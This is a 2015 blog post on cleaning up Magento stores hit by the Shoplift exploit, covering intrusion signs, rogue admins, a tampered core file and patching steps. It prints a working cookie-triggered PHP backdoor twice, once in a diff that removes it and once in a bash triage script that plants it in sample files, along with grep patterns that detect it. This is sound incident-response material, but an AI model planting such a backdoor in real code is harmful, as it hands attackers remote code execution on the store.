Published: June 3, 2015

Magento recovery after Shoplift vulnerability (post SUPEE-5344)

If your Magento store has not yet been patched, it is highly likely that it was already compromised by the automated exploit that went wild on April 22, 2015. To date, almost every unpatched store I see shows all of the following signs of intrusion:

  • lib/Varien/Db/Adapter/Pdo/Mysql.php has been modified, so the patch cannot be applied cleanly:
    $ bash ./PATCH_SUPEE-5344_CE_1.8.0.0_v1-2015-02-10-08-10-38.sh 
    Checking if patch can be applied/reverted successfully...
    ERROR: Patch can't be applied/reverted successfully.
    
    patching file app/code/core/Mage/Admin/Model/Observer.php
    patching file app/code/core/Mage/Core/Controller/Request/Http.php
    patching file app/code/core/Mage/Oauth/controllers/Adminhtml/Oauth/AuthorizeController.php
    patching file app/code/core/Mage/XmlConnect/Model/Observer.php
    patching file lib/Varien/Db/Adapter/Pdo/Mysql.php
    Hunk #1 FAILED at 2834.
    1 out of 1 hunk FAILED -- saving rejects to file lib/Varien/Db/Adapter/Pdo/Mysql.php.rej
    
  • app/code/core/Mage/Cms/controllers/IndexController.php has a cookie-triggered backdoor appended: a class that reads attacker-supplied cookies and executes their decoded contents as PHP
  • the Magpleasure/Filesystem extension is installed, giving easy filesystem access (file upload, PHP code modification) from the backend
  • the list of admin users at System > Permissions > Users is extended by one or more new admin users, typically with an email address in the @example.com domain (among many others)
  • the list of roles at System > Permissions > Roles is extended and full rights are granted to those admins
As a result, such a store can be fully managed in any way the intruder wants, with full admin rights to every aspect, including full filesystem access. To protect your Magento store from abuse and from a Google ban / blacklisting due to malware, make sure that your Magento is patched. For detailed instructions on patching you can refer to this article.

If your store was compromised or shows any of the signs of intrusion listed above, take the following steps right now to stop it:
  • save a backup of the current version first
  • prior to patching, roll back lib/Varien/Db/Adapter/Pdo/Mysql.php to the original version that corresponds to your Magento distribution, or use the already patched version from this article
  • roll back app/code/core/Mage/Cms/controllers/IndexController.php to the original version that corresponds to your Magento version, or at least delete the following lines (the ones marked with a leading minus sign in this diff, which compares the compromised file against the clean 1.9.0.1 distribution):
    --- app/code/core/Mage/Cms/controllers/IndexController.php      2015-04-22 03:47:49.742344082 +0200
    +++ orig-distr-1.9.0.1/IndexController.php        2015-06-02 10:26:25.197159978 +0200
    @@ -116,14 +116 @@
     }
    -
    -class Mage_Cms_Auth_olx
    -{
    -    public function __construct() {
    -        $auth_cookie = @$_COOKIE['nuwxlskmedlvjfdo3'];
    -        if ($auth_cookie) {
    -            $method = $auth_cookie(@$_COOKIE['nuwxlskmedlvjfdo2']);
    -            $auth = $auth_cookie(@$_COOKIE['nuwxlskmedlvjfdo1']);
    -            $method("/124/e",$auth,124);
    -        }
    -    }
    -}
    -$is_auth = new Mage_Cms_Auth_olx;
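Review bot: the `@@ -116,14 +116 @@` offset and the `+++ orig-distr-1.9.0.1/IndexController.php` path tie this hunk to Magento 1.9.0.1, so on another release do not rely on the line number: the thing to remove is everything after the controller's closing `}` (the `-` lines, since `---` is the compromised file and `+++` the clean one), from the blank line through `$is_auth = new Mage_Cms_Auth_olx;`. The shape of the class is what to look for if the cookie prefix `nuwxlskmedlvjfdo` or the `_olx` suffix differ on your store: three `@$_COOKIE[...]` reads, the first used as a function name to decode the other two, and the result passed to `$method("/124/e",$auth,124)`, where the `/e` modifier makes a `preg_replace()` call evaluate `$auth` as PHP. The `@` on each read also suppresses the notices that would otherwise have appeared in the PHP error log, so absence of errors there is not evidence the backdoor was unused.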
    
    
  • delete any unknown users at System > Permissions > Users and revoke their roles at System > Permissions > Roles
  • disable the Magpleasure/Filesystem extension or uninstall it via Magento Connect Manager
  • scan your store with our Tester tool and with the Scan Tool from Magento
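As an added example (not code from the original post, from Magento or from the extension vendor), the following read-only triage script checks a Magento 1.x tree for the signs of intrusion listed at the top of this article and prints what the recovery steps above then have to fix. It assumes you have unpacked a clean distribution of the same Magento version somewhere to compare against, that the Magpleasure/Filesystem extension follows the usual Magento 1 layout (declaration under app/etc/modules, code under app/code/<pool>/Magpleasure/Filesystem), and that the admin tables have the Magento 1 admin_user / admin_role schema. The sample trees built by make_sample_trees are constructed for demonstration and are not a real store.

```shell
#!/usr/bin/env bash
# Added Shoplift triage script (not from the original article or from Magento).
# Usage: ./shoplift_triage.sh /var/www/magento /tmp/clean-magento-1.9.0.1
# The second argument is an unpacked clean distribution of the SAME Magento
# version, used only as a comparison reference. Nothing is modified.
set -u

# Indicator: cookie-triggered backdoor. The class appended to IndexController
# reads three $_COOKIE values and ends in a "/.../e" pattern (preg_replace's
# eval modifier), so flag PHP files that read $_COOKIE and contain such a
# pattern, or the class / cookie names seen in this campaign. Review the hits.
find_cookie_backdoors() {   # <store root>
    grep -rlF --include='*.php' '$_COOKIE[' "$1" 2>/dev/null | sort |
    while read -r f; do
        if grep -qE '"/[^"]*/e"|Mage_Cms_Auth_olx|nuwxlskmedlvjfdo' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Indicator: a core file (e.g. lib/Varien/Db/Adapter/Pdo/Mysql.php) differs
# from the clean distribution. Returns 0 when the two copies are identical.
file_matches_reference() {   # <store root> <reference root> <relative path>
    cmp -s "$1/$3" "$2/$3"
}

# Indicator: Magpleasure/Filesystem extension present (assumed Magento 1
# layout: declaration in app/etc/modules, code under app/code/<pool>/...).
magpleasure_installed() {   # <store root>
    ls "$1"/app/etc/modules/Magpleasure_*.xml >/dev/null 2>&1 && return 0
    ls -d "$1"/app/code/*/Magpleasure/Filesystem >/dev/null 2>&1
}

# Indicators: rogue admins and roles (Magento 1 admin_user / admin_role).
# Lists accounts created on or after the April 22, 2015 exploit wave or using
# an @example.com address, with the role they were given. Run it as:
#   mysql -u <user> -p <db> -e "$(admin_audit_sql)"
admin_audit_sql() {
    cat <<'SQL'
SELECT u.user_id, u.username, u.email, u.created, u.is_active,
       g.role_name AS parent_role
FROM admin_user u
LEFT JOIN admin_role ur ON ur.user_id = u.user_id AND ur.role_type = 'U'
LEFT JOIN admin_role g  ON g.role_id = ur.parent_id
WHERE u.created >= '2015-04-22' OR u.email LIKE '%@example.com'
ORDER BY u.created;
SQL
}

# Runs every check; returns 1 if any indicator is present, 0 if none is.
triage() {   # <store root> <reference root>
    local rel hits status=0
    for rel in lib/Varien/Db/Adapter/Pdo/Mysql.php \
               app/code/core/Mage/Cms/controllers/IndexController.php; do
        if file_matches_reference "$1" "$2" "$rel"; then
            echo "OK       $rel matches the clean distribution"
        else
            echo "MODIFIED $rel differs from the clean distribution"; status=1
        fi
    done
    hits=$(find_cookie_backdoors "$1")
    if [ -n "$hits" ]; then
        echo "BACKDOOR cookie-triggered code in:"; echo "$hits"; status=1
    fi
    if magpleasure_installed "$1"; then
        echo "EXT      Magpleasure/Filesystem is installed"; status=1
    fi
    echo "Next, audit admin users and roles with:"; admin_audit_sql
    return $status
}

# Constructed sample data (not a real store): a clean reference tree and an
# infected copy showing each indicator, so the checks can be tried offline.
make_sample_trees() {   # prints "<store> <reference>"
    local base ref store t
    base=$(mktemp -d); ref="$base/clean"; store="$base/store"
    for t in "$ref" "$store"; do
        mkdir -p "$t/lib/Varien/Db/Adapter/Pdo" "$t/app/etc/modules" \
                 "$t/app/code/core/Mage/Cms/controllers" "$t/app/code/core/Mage/Core/Model"
        printf '<?php\nclass Varien_Db_Adapter_Pdo_Mysql {}\n' > "$t/lib/Varien/Db/Adapter/Pdo/Mysql.php"
        printf '<?php\nclass Mage_Cms_IndexController {}\n' > "$t/app/code/core/Mage/Cms/controllers/IndexController.php"
        # legitimate core code reads $_COOKIE too; it must not be flagged
        printf '<?php\n$c = $_COOKIE["frontend"];\n' > "$t/app/code/core/Mage/Core/Model/Cookie.php"
    done
    echo '// tampered' >> "$store/lib/Varien/Db/Adapter/Pdo/Mysql.php"
    cat >> "$store/app/code/core/Mage/Cms/controllers/IndexController.php" <<'EOF'
class Mage_Cms_Auth_olx {
    public function __construct() {
        $auth_cookie = @$_COOKIE['nuwxlskmedlvjfdo3'];
        if ($auth_cookie) {
            $method = $auth_cookie(@$_COOKIE['nuwxlskmedlvjfdo2']);
            $auth = $auth_cookie(@$_COOKIE['nuwxlskmedlvjfdo1']);
            $method("/124/e",$auth,124);
        }
    }
}
$is_auth = new Mage_Cms_Auth_olx;
EOF
    echo '<config/>' > "$store/app/etc/modules/Magpleasure_Filesystem.xml"
    echo "$store $ref"
}

if [ $# -eq 2 ]; then triage "$1" "$2"; fi
```

The file comparison deliberately uses a clean copy of your own version rather than the patch's dry run, because a tampered Mysql.php is only one of the files the intruder can touch; once the two core files match, extend the loop in triage to any other path you want verified. The grep is intentionally broad (any PHP file that reads cookies and carries an e-modifier pattern), so inspect each hit rather than deleting blindly.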
Alternatively, you can use our patch installation service; all these actions are included in our standard patch checklist.

Note: these actions recover only from the one particular automated exploitation we have mostly seen on unpatched Magento installations. If an intruder actually used the hole to enter your installation by hand, they could have modified any file and left other backdoors for later access.
For a detailed investigation, request a full scan, or restore the whole installation from a backup made prior to April 22, 2015 and install all missing Magento patches right after the restoration.

If you have any difficulties with solving this problem or got a similar one, please let us know in comments below, so we can find the solution together.


Posted in: Magento Maintenance
